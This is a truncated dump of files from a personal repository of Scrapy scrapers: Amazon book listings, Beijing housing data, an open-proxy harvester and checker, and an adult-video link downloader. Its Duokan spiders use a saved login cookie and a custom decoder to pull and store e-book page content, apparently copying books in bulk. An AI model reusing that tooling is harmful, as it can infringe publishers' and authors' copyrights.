"text": "# -*- coding: utf-8 -*-\nimport pymongo\nfrom scrapy.http import Request\n\nclass CheckPointSpider(object):\n \"\"\"record check point to mongo\"\"\"\n\n collection_name = 'checkpoint'\n def process_spider_output(self, response, result, spider):\n \"\"\"record this page\n \"\"\"\n mongo_uri=spider.crawler.settings.get('MONGO_URI')\n mongo_db=spider.crawler.settings.get('MONGO_DB')\n client = pymongo.MongoClient(mongo_uri)\n db = client[mongo_db]\n def add_field(request, response):\n if isinstance(request, Request):\n db[self.collection_name].update_one(\n {},\n {'$set': {'page_url': response.request.url}},\n upsert=True)\n return True\n ret = [req for req in result if add_field(req, response)]\n client.close()\n return ret\n"
},
{
"alpha_fraction": 0.49494948983192444,
"alphanum_fraction": 0.5310245156288147,
"avg_line_length": 23.678571701049805,
"blob_id": "7c7de7845303c2d66e9fa60b91fbd02822ae80df",
"content_id": "6b86f03c082668fe5b3411627a6ba6a719352e6a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 701,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 28,
"path": "/small/xiaoying/utils.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport re\nimport datetime\n\ndef money2float(money):\n # Remove comma(,)\n money = money.replace(',', '')\n g = re.match('([0-9\\.]+)', money)\n if not g:\n return money\n num = float(g.group(1))\n pos = 0\n while True:\n pos = money.find('万', pos+1)\n if pos != -1:\n num *= 1e4\n else:\n break\n return num\n\n\ndef period2timedelta(period):\n g = re.match('(?:([0-9]+)个月)?(?:([0-9]+)天)?', period)\n month = int(g.group(1)) if g.group(1) else 0\n day = int(g.group(2)) if g.group(2) else 0\n if g.group(1) is None and g.group(2) is None:\n return period\n return datetime.timedelta(days=day + month*30)\n\n\n"
},
{
"alpha_fraction": 0.6398515105247498,
"alphanum_fraction": 0.7215346693992615,
"avg_line_length": 25.064516067504883,
"blob_id": "93bd1c7bd0cde02967fa9fba13125c8b76d906e5",
"content_id": "4190bdb8ac8e393ff2c636bd2c144338f20cd6ec",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 808,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 31,
"path": "/proxy/proxy/settings.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "import datetime\n\n\nBOT_NAME = 'proxySpider'\nDOWNLOAD_DELAY = 2\nDOWNLOAD_TIMEOUT = 7\n\nRETRY_HTTP_CODES = [400, 500, 502, 503, 521]\n\nDOWNLOADER_MIDDLEWARES = {\n 'proxy.downloadermiddlewares.proxy.ProxyMiddleware': 200,\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,\n 'random_useragent.RandomUserAgentMiddleware': 400\n}\nUSER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\"\n\nITEM_PIPELINES = {\n 'proxy.pipelines.DuplicatesPipeline': 300,\n 'proxy.pipelines.RedisPipeline': 800,\n}\n\nREDIS_HOST = 'localhost'\nREDIS_PORT = 4149\nREDIS_DB = 0\nREDIS_TEST_DB = 1\nREDIS_SEP = ':'\nNORMAL_S = 'normal'\nGFW_S = 'gfw'\nHOST_S = 'host'\nEXPIRE_PRE = 'expire'\nEXPIRE_DELTA = datetime.timedelta(seconds=60*60*3)\n"
},
{
"alpha_fraction": 0.5043182373046875,
"alphanum_fraction": 0.5252551436424255,
"avg_line_length": 50.635135650634766,
"blob_id": "c6beea79878d102a5d27130b1e254e10c9d1a73e",
"content_id": "d17883608f048bcc6ea2feb54284a7465aa7826d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3861,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 74,
"path": "/amazon/spiders/list.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport datetime\nimport scrapy\nfrom amazon.items import BookItem\n\n\ndef safe_list_get(l, idx, default=''):\n return l[idx] if len(l) > idx else default\n\n\nclass AmazonSpider(scrapy.Spider):\n name = \"amazon\"\n allowed_domains = [\"amazon.cn\"]\n cat = None\n start_url = None\n start_urls = {\n '文学巨匠': 'https://www.amazon.cn/s/?node=1851470071&ie=UTF8',\n '外国文学': 'https://www.amazon.cn/s/?node=1851471071&ie=UTF8',\n '秋乏冬眠': 'https://www.amazon.cn/s/?node=1851472071&ie=UTF8',\n '文艺青年': 'https://www.amazon.cn/s/?node=1851473071&ie=UTF8',\n '诺贝尔奖': 'https://www.amazon.cn/s/?node=1851474071&ie=UTF8',\n }\n\n def __init__(self, cat=None, url=None, node=None):\n if cat is None:\n self.cat = datetime.datetime.today().strftime('%Y%m%d')\n if node or url:\n if url:\n self.start_url = url\n else:\n self.start_url = 'https://www.amazon.cn/s/?node=%s' % (node)\n\n def start_requests(self):\n if self.cat and self.start_url:\n return [scrapy.Request(\n self.start_url,\n meta={'category': self.cat},\n callback=self.parse_book_follow_next_page\n )]\n\n def parse_book_follow_next_page(self, response):\n lis = response.xpath('//ul[contains(@class, \"s-result-list\")]/li') or \\\n response.xpath('//div[contains(@class, \"s-result-list\")]/div[contains(@class, \"s-result-item\")]')\n for li in lis:\n item = BookItem()\n item['title'] = safe_list_get(li.xpath('.//h2/@data-attribute').extract() or \\\n li.xpath('.//h2//span/text()').extract(),\n 0, '')\n if item['title'] == '':\n continue\n item['date'] = safe_list_get(li.xpath('.//div[@class=\"a-row a-spacing-none\"][1]/span/text()').extract(), 0, 'Unknown')\n item['author'] = safe_list_get(li.xpath('.//div[@class=\"a-row a-spacing-none\"][2]/span/text()').extract(), 0, 'Unknown')\n item['author_date'] = ''.join(li.xpath('.//div[@class=\"a-row a-size-base a-color-secondary\"][1]/span/text()').extract())\n # price = li.xpath('.//span[contains(@class, \"s-price\")]/text()').extract()\n # if len(price) == 0:\n # price = li.xpath('.//span[contains(@class, \"a-color-price\")]/text()').extract()\n # item['price'] = price[-1] if len(price) > 0 else '-1.0'\n item['price'] = ''.join(li.xpath('.//span[contains(@class, \"price\")]/text()')[-3:].extract())\n item['rating'] = float(safe_list_get(li.xpath('.//i[contains(@class, \"a-icon-star\")]/span/text()').re('[\\d\\.]+'), 0, 0.0))\n item['rating_num'] = int(safe_list_get(li.xpath('.//a[contains(@class, \"a-size-small\")]/text()').re('\\d+') or \\\n li.xpath('.//div[contains(@class,\"a-size-small\")]/span[2]//span/text()').re('\\d+'), 0, 0))\n item['url'] = safe_list_get(li.xpath('.//a[contains(@class, \"s-access-detail-page\")]/@href').extract() or \\\n li.xpath('.//a[contains(@class, \"a-link-normal\")]/@href').extract(), 0, '')\n if self.allowed_domains[0] not in item['url']:\n item['url'] = self.allowed_domains[0] + item['url']\n item['category'] = response.meta['category']\n yield item\n\n next_page = response.xpath('//li[contains(@class, \"a-last\")]/a/@href') or \\\n response.xpath('//a[@id=\"pagnNextLink\"]/@href')\n self.logger.debug(next_page)\n if next_page:\n url = response.urljoin(next_page[0].extract())\n yield scrapy.Request(url, self.parse_book_follow_next_page, meta=response.meta)\n"
},
{
"alpha_fraction": 0.5301204919815063,
"alphanum_fraction": 0.6064257025718689,
"avg_line_length": 14.5625,
"blob_id": "4093a46fd1eb4a0709e987401afe5bd002225b1e",
"content_id": "9145a6ffaaf18e748fac5911e00278db612d5fde",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 249,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 16,
"path": "/Pipfile",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "[[source]]\nurl = \"https://pypi.python.org/simple\"\nverify_ssl = true\nname = \"pypi\"\n\n[packages]\nscrapy = \">=1.6.0\"\nselenium = \">=3.141.0\"\nipython = \">=7.2.0\"\npymongo = \">=3.7.2\"\nsimplejson = \">=3.16\"\n\n[dev-packages]\n\n[requires]\npython_version = \"3.7\"\n"
},
{
"alpha_fraction": 0.5382803082466125,
"alphanum_fraction": 0.6784452199935913,
"avg_line_length": 35.826087951660156,
"blob_id": "c164e2ec296f388377709cd9a7f936cf245a1c79",
"content_id": "1cbd488283eaba36b7661eccdc2054cc5e325e8e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 909,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 23,
"path": "/small/xiaoying/test_utils.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom utils import period2timedelta, money2float\nfrom datetime import timedelta as td\n\n\ndef test_money2float():\n assert money2float('81.87万') == 818700.0\n assert money2float('6,000') == 6000.0\n assert money2float('6,683.57') == 6683.57\n assert money2float('6,683.57') == 6683.57\n # assert money2float('6,600亿') == 6600e8\n # assert money2float('6,683亿123万') == 66830123e4\n\n\ndef test_period2timedelta():\n assert period2timedelta('11个月29天') == td(days=29+11*30)\n assert period2timedelta('1个月') == td(days=30)\n assert period2timedelta('29天') == td(days=29)\n assert period2timedelta('0天') == td(days=0)\n assert period2timedelta('0个月0天') == td(days=0)\n assert period2timedelta('0个月10天') == td(days=10)\n assert period2timedelta('3个月0天') == td(days=90)\n assert period2timedelta('不合法时间') == '不合法时间'\n\n\n"
},
{
"alpha_fraction": 0.5609405040740967,
"alphanum_fraction": 0.5638195872306824,
"avg_line_length": 36.21428680419922,
"blob_id": "bd06d760216840aed4bede6585d1638188921f6c",
"content_id": "3acd52765e02fc949c10750e53d8b104d11eafdb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2084,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 56,
"path": "/duokan/duokan/spiders/list.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport logging\nimport glob\nimport csv\nimport http.cookiejar\nimport os\nfrom duokan.spiders.base import BaseSpider, FileSaverMixin\n\n\nlogger = logging.getLogger('duokan')\n\nclass ListSpider(BaseSpider, FileSaverMixin):\n name = 'list'\n\n def __init__(self):\n cj = http.cookiejar.MozillaCookieJar()\n # dump cookie with cookies.txt and save as a file\n cj.load('morefreeze_all.cookie')\n self.cookie = {k.name: k.value for k in cj if k.domain.endswith('duokan.com')}\n self.left_page = {}\n\n def start_requests(self):\n # check _done file to detect whether book is finish\n done_dirs = {os.path.basename(os.path.dirname(dir)) for dir in glob.iglob('url/*/_done')}\n with open('duokan.csv', 'r') as f:\n r = csv.DictReader(f)\n for row in r:\n if row['uuid'] not in done_dirs:\n yield scrapy.Request('http://www.duokan.com/reader/book_info/%s/medium' % (row['uuid']),\n cookies=self.cookie,\n callback=self.parse_book_info)\n\n def parse_book_info(self, response):\n super().parse_book_info(response)\n self.left_page[book_info['book_id']] = len(book_info['pages'])\n\n def parse_page(self, response):\n super().parse_page(response)\n self.left_page[req.meta['book_id']] -= 1\n\n def save_page(self, response):\n req = response.request\n if response.status != 200:\n logger.warning('no page iss, book_id[%s] page_id[%s]' % (req.meta['book_id'], req.meta['page_id']))\n return\n dir = os.path.join('data', req.meta['book_id'])\n with open(os.path.join(dir, req.meta['page_id']), 'wb') as f:\n f.write(response.body)\n\n # def closed(self, reason):\n # for book_id in self.left_page:\n # if self.left_page[book_id] == 0:\n # url_dir = os.path.join('url', book_id)\n # with open(os.path(url_dir, '_done'), 'w') as f:\n # pass\n"
},
{
"alpha_fraction": 0.6545040011405945,
"alphanum_fraction": 0.6898517608642578,
"avg_line_length": 41.780487060546875,
"blob_id": "aea21760259cdda9491f040b043d52a583fd5113",
"content_id": "f847736ef152faa84e531ead715adaa1c8c877c7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1850,
"license_type": "permissive",
"max_line_length": 185,
"num_lines": 41,
"path": "/house/lianjia/load_bj.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport json\nimport pandas as pd\n\n\ndata = []\nwith open('bj/bizcircle_110000.json', 'r') as f:\n for line in f:\n data.extend(json.loads(line)['data'])\ndf = pd.DataFrame(data)\ndf.latitude = df.latitude.astype(float)\ndf.longitude = df.longitude.astype(float)\n# 五环到三环之间,西起上地,东到来广营\nlon1 = 116.195017\nlon2 = 116.449957\nlat1 = 39.975562\nlat2 = 40.059\nselected_community = df[(df.avg_unit_price<80000) & (lon1<df.longitude) & (df.longitude<lon2) & (lat1<df.latitude) & (df.latitude<lat2)][['name', 'id', 'avg_unit_price', 'house_count']]\ndata = []\nfor _, row in selected_community.iterrows():\n with open('bj/%s_%s.json' % (row['id'], row['name']), 'r') as f:\n for line in f:\n data.extend(json.loads(line)['data']['list'])\ntotal_house = pd.DataFrame(data)\ntotal_house.price_total = total_house.price_total.astype(float)\ntotal_house.house_area = total_house.house_area.astype(float)\nsubway_data = []\nfor _, row in total_house.iterrows():\n d = row['subway_station'] if not pd.isnull(row['subway_station']) else {}\n subway_data.append(d)\nsubway = pd.DataFrame(subway_data)\nsubway = subway.fillna(0)\n# 将规整后的地铁数据取出\nfor k in subway.keys():\n total_house[k] = subway[k]\nselected_house = total_house[(total_house.price_total<=550) & (total_house.house_area>=75) & (total_house.frame_orientation.str.contains(u'南'))]\n# is_restriction 过滤掉商住两用, is_five 取出满五年的\nselected_house = selected_house[(~ selected_house.tags.str.contains('is_restriction')) & (selected_house.tags.str.contains('is_five'))]\nnear_subway = selected_house[(selected_house.distance_value<=1500) & (selected_house.distance_value>0)]\n# 补上链家的url\nnear_subway['url'] = near_subway.house_code.apply(lambda x: 'http://bj.lianjia.com/ershoufang/%s.html' % (x))\n"
},
{
"alpha_fraction": 0.5474452376365662,
"alphanum_fraction": 0.5568300485610962,
"avg_line_length": 35.88461685180664,
"blob_id": "c78cde56632c8b3bbf7dbf91d8cb1495ecfcd59d",
"content_id": "fb4f14e110fa1d331898cb429040fdba120959eb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 959,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 26,
"path": "/duokan/duokan/spiders/free.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport logging\nimport scrapy\nfrom duokan.spiders.base import BaseSpider, FileSaverMixin\n\nlogger = logging.getLogger('duokan')\n\nclass FreeSpider(BaseSpider, FileSaverMixin):\n name = 'list'\n save_file = True\n\n start_urls = ['http://www.duokan.com/']\n # start_urls = ['http://www.duokan.com/special/10882']\n\n def parse(self, response):\n special = response.css('div.u-aimg>ul>li>a::attr(href)').extract()\n yield scrapy.Request('http://www.duokan.com%s' % (special[0]),\n callback=self.parse2,\n )\n\n def parse2(self, response):\n for book_id in response.css('ul.j-list>li::attr(data-id)').extract():\n yield scrapy.Request('http://www.duokan.com/reader/book_info/%s/medium' % (book_id),\n cookies=self.cookie,\n callback=self.parse_book_info,\n )\n"
},
{
"alpha_fraction": 0.591930091381073,
"alphanum_fraction": 0.5940099954605103,
"avg_line_length": 31.486486434936523,
"blob_id": "98ed444363f720691f571213833625ff3fbdddfe",
"content_id": "e39ee5b63f5b4c47c522cdc06d3c7346d10d17fd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2404,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 74,
"path": "/proxy/proxy/pipelines.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom proxy.checker import ProxyChecker\nfrom scrapy.exceptions import DropItem\nfrom db import RedisPool\nimport settings\n\n\nclass DuplicatesPipeline(object):\n\n \"\"\"check ip whether duplicate with redis\"\"\"\n def __init__(self, redis_host, redis_port, redis_db):\n \"\"\"get a redis connection\n \"\"\"\n self.conn = RedisPool.get_pool(redis_host, redis_port, redis_db)\n\n @classmethod\n def from_crawler(cls, crawler):\n redis_host = crawler.settings.get('REDIS_HOST')\n redis_port = crawler.settings.get('REDIS_PORT')\n redis_db = crawler.settings.get('REDIS_DB')\n return cls(redis_host, redis_port, redis_db)\n\n def process_item(self, item, spider):\n \"\"\"return ip is duplicate or not\n\n :item: crawl item including host port\n :returns: return item or DropItem\n \"\"\"\n if 'ip' not in item:\n raise DropItem('')\n port = item.get('port', 80)\n host = '%s:%s' % (item['ip'], port)\n if self.conn.sismember(settings.HOST_S, host) or self.dup_in_queue(host):\n raise DropItem('%s, cause duplicate' % (host))\n else:\n return item\n\n def dup_in_queue(self, host):\n set_list = [settings.NORMAL_S, settings.GFW_S]\n for set_name in set_list:\n if self.conn.sismember(set_name, host):\n return True\n return False\n\n\nclass RedisPipeline(object):\n \"\"\"If item has 'normal' or 'gfw' then store to redis\n \"\"\"\n def __init__(self, redis_host, redis_port, redis_db):\n \"\"\"get a redis connection\n \"\"\"\n self.conn = RedisPool.get_pool(redis_host, redis_port, redis_db)\n\n @classmethod\n def from_crawler(cls, crawler):\n redis_host = crawler.settings.get('REDIS_HOST')\n redis_port = crawler.settings.get('REDIS_PORT')\n redis_db = crawler.settings.get('REDIS_DB')\n cls.host_s = crawler.settings.get('HOST_S')\n return cls(redis_host, redis_port, redis_db)\n\n \"\"\"save to redis\"\"\"\n def process_item(self, item, spider):\n \"\"\"save to redis and return item\n\n :item: crawl item including host port\n :returns: return item or DropItem\n \"\"\"\n if 'ip' not in item:\n raise DropItem('')\n port = item.get('port', 80)\n host = '%s:%s' % (item['ip'], port)\n self.conn.sadd(self.host_s, host)\n return item\n"
},
{
"alpha_fraction": 0.6451612710952759,
"alphanum_fraction": 0.6619355082511902,
"avg_line_length": 27.703702926635742,
"blob_id": "c4b9c83587468bf961a43856387ba503d7f9dd23",
"content_id": "7cec343ea9e748965e43802588ce2a53f3a4a656",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1550,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 54,
"path": "/house/lianjia/lj_dag.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom os import path\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import BranchPythonOperator\nimport datetime\n\n\ndef need_run(ti, execution_date, **kwargs):\n long_time = datetime.timedelta(days=1, hours=20)\n if ti.start_date and execution_date and ti.start_date - execution_date < long_time:\n return 'run_spider'\n return ''\n\ndir = path.abspath(path.dirname(path.realpath(__file__)))\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime.datetime(2017, 7, 24),\n 'email': ['[email protected]', ],\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 3,\n 'retry_delay': datetime.timedelta(minutes=5),\n 'queue': 'bash_queue',\n 'provide_context': True,\n 'retry_exponential_backoff': True,\n # 'end_date': datetime.datetime(2017, 1, 1),\n}\n\ndag = DAG('lianjia2', default_args=default_args, schedule_interval='@weekly')\n\n\nonly_run_now = BranchPythonOperator(\n task_id='only_run_now',\n python_callable=need_run,\n dag=dag\n)\nbj_code = 110000\noutput_dir = 'bj{{ ds_nodash }}'\nrun_spider = BashOperator(\n task_id='run_spider',\n bash_command='cd {dir} && ./run.sh {bj_code} \"{output_dir}\" '.format(dir=dir, bj_code=bj_code, output_dir=output_dir),\n dag=dag\n)\n\nimport_db = BashOperator(\n task_id='import_db',\n bash_command='cd {dir} && ./import_db.sh \"{output_dir}\" '.format(dir=dir, output_dir=output_dir),\n dag=dag,\n)\n\nonly_run_now >> run_spider >> import_db\n"
},
{
"alpha_fraction": 0.5603668689727783,
"alphanum_fraction": 0.565629243850708,
"avg_line_length": 29.509174346923828,
"blob_id": "537bf91d6ffa54fc16f1f05f23232e4e92aea003",
"content_id": "dae19d70192f4eb0a5d088ac1d1d345e81da59e8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6651,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 218,
"path": "/proxy/proxy/checker.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport urllib\nimport urllib2\nimport json\nimport logging\nimport settings\nimport time\nimport datetime\nimport threading\nimport signal\nimport sys\nimport gevent\nfrom gevent.lock import Semaphore\nfrom db import RedisPool, build_key\n\ndef _datetime(d):\n if isinstance(d, datetime.datetime):\n return d\n if isinstance(d, datetime.date):\n return datetime.datetime(d.year, d.month, d.day)\n try:\n n = datetime.datetime.strptime(d, '%Y-%m-%d %H:%M:%S')\n except ValueError:\n try:\n n = datetime.datetime.strptime(d, \"%Y-%m-%d %H:%M:%S.%f\")\n except ValueError:\n try:\n n = datetime.datetime.strptime(d, \"%Y-%m-%d\")\n except ValueError:\n n = datetime.datetime.strptime(d, \"%Y-%m-%d %H:%M\")\n return n\n\nlock = Semaphore()\nclass ProxyChecker(object):\n TIMEOUT = 5\n url_list = []\n ret = {}\n proxy_host = ''\n\n \"\"\"Get from redis and check host\"\"\"\n\n def __init__(self, host, timeout=None):\n self.proxy_host = host\n ph = urllib2.ProxyHandler({'http': host, 'https': host})\n self.opener = urllib2.build_opener(ph)\n if timeout is not None:\n self.TIMEOUT = timeout\n\n def check_url(self, url):\n \"\"\"try to fetch url to judge opener is worked\n\n :url: url to check\n :returns: {succ: True, lag: 10(ms)}\n \"\"\"\n try:\n resp = self.opener.open(url, timeout=self.TIMEOUT)\n logging.debug(resp)\n if resp and resp.code == 200:\n succ = True\n except Exception as e:\n succ = False\n logging.warning('Check url(%s) throught proxy(%s) error: %s' % (url, self.opener.handlers[0].proxies, e))\n # TODO: return lag\n return {'succ': succ}\n\n \"\"\"Check proxy normal throught httpbin.org/ip \"\"\"\n def check_httpbin(self):\n url = 'http://httpbin.org/ip'\n try:\n resp = self.opener.open(url, timeout=self.TIMEOUT)\n resp_body = ''.join(resp.readlines())\n if resp and resp.code == 200 and resp_body:\n return json.loads(resp_body)['origin'] == self.proxy_host.split(':', 2)[0]\n except Exception as e:\n logging.warning('Check url(%s) throught proxy(%s) error: %s' % (url, self.opener.handlers[0].proxies, e))\n return False\n\n \"\"\"Base class of IP pipeline, use for checking IP\"\"\"\n def check_proxy(self):\n \"\"\"return host is valid or not\n \"\"\"\n if not self.check_httpbin():\n return\n threads = []\n self._before_check()\n for index, url in enumerate(self.url_list):\n threads.append(gevent.spawn(self._check, index, url))\n gevent.joinall(threads)\n self._after_check()\n\n def _check(self, index, url):\n ret = self.check_url(url)\n self._apply_rule(index, url, ret)\n\n def _before_check(self):\n raise NotImplementedError\n\n def _apply_rule(self, index, url, ret):\n raise NotImplementedError\n\n def _after_check(self):\n raise NotImplementedError\n\n\nclass NormalChecker(ProxyChecker):\n url_list = [\n 'http://www.baidu.com',\n 'http://weibo.com',\n 'http://zhihu.com',\n 'http://tower.im',\n 'http://www.acfun.tv',\n ]\n factor = 0.8\n\n def _before_check(self):\n self.succ_cnt = 0\n\n def _apply_rule(self, index, url, ret):\n if ret.get('succ', False):\n with lock:\n self.succ_cnt += 1\n\n def _after_check(self):\n n = len(self.url_list)\n if n * self.factor <= self.succ_cnt:\n logging.debug('Check %s is successful' % (self.proxy_host))\n self.ret['ping'] = True\n\n\nclass LadderChecker(ProxyChecker):\n \"\"\"If >=factor*n url pass then threat as valid\n \"\"\"\n url_list = [\n 'http://www.twitter.com',\n 'http://www.google.com',\n 'http://www.facebook.com',\n 'http://www.youtube.com',\n 'http://www.blogger.com',\n ]\n factor = 0.8\n\n def _before_check(self):\n self.succ_cnt = 0\n\n def _apply_rule(self, index, url, ret):\n if ret.get('succ', False):\n with lock:\n self.succ_cnt += 1\n\n def _after_check(self):\n n = len(self.url_list)\n if n * self.factor <= self.succ_cnt:\n logging.debug('Check in gfw %s is successful' % (self.proxy_host))\n self.ret['ping'] = True\n\n\ndef put_set(conn):\n \"\"\"Check timeout host which need be checked again and put it in set\n \"\"\"\n set_list = [settings.NORMAL_S, settings.GFW_S]\n while True:\n for set_name in set_list:\n while conn.scard(set_name) > 0:\n host = conn.srandmember(set_name, 0)\n expire_key = build_key([settings.EXPIRE_PRE, host])\n expire_time = conn.get(expire_key)\n expire_time = _datetime(expire_time) if expire_time else datetime.datetime.fromtimestamp(0)\n if datetime.datetime.now() - expire_time >= settings.EXPIRE_DELTA:\n conn.sadd(settings.HOST_S, host)\n conn.srem(set_name, host)\n logging.debug(\"Push from %s set with %s\" % (set_name, host))\n time.sleep(0.2)\n time.sleep(3)\n\n\ndef check_proxy(conn):\n \"\"\"Check proxy from channel\n \"\"\"\n set_dict = (\n (settings.NORMAL_S, NormalChecker),\n (settings.GFW_S, LadderChecker),\n )\n while True:\n time.sleep(0.2)\n host = conn.spop(settings.HOST_S)\n if host is None:\n continue\n for set_name, checker in set_dict:\n pc = checker(host)\n pc.check_proxy()\n if pc.ret.get('ping', False):\n conn.sadd(set_name, host)\n expire_key = build_key([settings.EXPIRE_PRE, host])\n conn.set(expire_key, datetime.datetime.now()+settings.EXPIRE_DELTA)\n logging.debug(\"Proxy[%s] check successfully in %s\" % (pc.proxy_host, set_name))\n\n\ndef signal_handler(signal, frame):\n print 'Press Ctrl-C!'\n sys.exit(0)\n\n\ndef main():\n signal.signal(signal.SIGINT, signal_handler)\n conn = RedisPool.get_pool(settings.REDIS_HOST, settings.REDIS_PORT, settings.REDIS_DB)\n check_proxy_task = threading.Thread(target=check_proxy, args=(conn, ))\n put_set_task = threading.Thread(target=put_set, args=(conn, ))\n check_proxy_task.setDaemon(True)\n put_set_task.setDaemon(True)\n check_proxy_task.start()\n put_set_task.start()\n while True:\n time.sleep(1)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n main()\n"
},
{
"alpha_fraction": 0.5890949964523315,
"alphanum_fraction": 0.6008993983268738,
"avg_line_length": 29.672412872314453,
"blob_id": "f762cfd1bc0c7cea789529141d46e7c9297df38a",
"content_id": "1bcac39c069629524469ea7ebd5f625b96df97c3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1779,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 58,
"path": "/caoporn/get_mp4.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom __future__ import print_function\nimport sys\nimport os\nimport argparse\nimport re\nimport requests\nimport urllib\nfrom tqdm import tqdm\n\n\ndef get_mp4(url):\n r = requests.get(url)\n content = r.content.decode('utf-8')\n m = re.search(r'textarea name=\"video_embed_code[^>]+>([^<]+)</textarea>', content)\n if not m:\n return ''\n emb_url = m.group(1).strip()\n r = requests.get(emb_url)\n content = r.content.decode('utf-8')\n m = re.search(r'<source src=\"([^\"]+.mp4[^\"]+)\"', content)\n if not m:\n return ''\n mp4_url = m.group(1).strip()\n return mp4_url\n\ndef download(url, output_dir):\n up = urllib.parse.urlparse(url)\n file_name = os.path.basename(up.path)\n r = requests.get(url, stream=True)\n total_length = int(r.headers.get('content-length', 0))\n with open(os.path.join(output_dir, file_name), 'wb') as f, tqdm(total=total_length, unit='B', unit_scale=True) as pbar:\n for data in r.iter_content(chunk_size=4096):\n f.write(data)\n pbar.update(4096)\n\ndef main():\n parser = argparse.ArgumentParser()\n mut_group = parser.add_mutually_exclusive_group(required=True)\n mut_group.add_argument('-c', '--code', nargs='*')\n mut_group.add_argument('-u', '--url', nargs='*')\n parser.add_argument('-od', '--output-dir', type=str)\n args = parser.parse_args()\n if args.code:\n urls = []\n for code in args.code:\n urls.append('https://51.caoxee.com/video/%s' % code)\n else:\n urls = args.url\n true_urls = list(map(get_mp4, urls))\n if args.output_dir:\n list(map(lambda url: download(url, args.output_dir), filter(lambda x: x != '', true_urls)))\n else:\n list(map(print, true_urls))\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5323208570480347,
"alphanum_fraction": 0.5350467562675476,
"avg_line_length": 36.21739196777344,
"blob_id": "b4634e803e8bcb4d8a994a1caea7009f3b8492ff",
"content_id": "b5804cd7ebdd442dd9f1975596b2115985687152",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2568,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 69,
"path": "/duokan/duokan/spiders/base.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport logging\nimport os\nimport scrapy\nimport simplejson\nimport duokan.dkbson as dk\nfrom duokan.items import BookInfo, IssItem\n\nlogger = logging.getLogger('duokan')\n\nclass FileSaverMixin(object):\n\n def parse_book_info(self, response):\n book_info = simplejson.loads(dk.decode(response.body))\n url_dir = os.path.join('url', book_info['book_id'])\n os.makedirs(url_dir, exist_ok=True)\n\n def parse_page(self, response):\n meta = response.request.meta\n dir = os.path.join('url', meta['book_id'])\n page_info = simplejson.loads(dk.decode(response.body))\n with open(os.path.join(dir, meta['page_id']), 'w') as f:\n f.write(page_info['url'])\n\n\nclass BaseSpider(scrapy.Spider, FileSaverMixin):\n name = 'base'\n allowed_domains = ['duokan.com']\n cookie = None\n save_file = False\n\n def parse_book_info(self, response):\n if response.status != 200:\n return\n if self.save_file:\n super().parse_book_info(response)\n book_info = simplejson.loads(dk.decode(response.body))\n yield BookInfo({'id': book_info['book_id'], 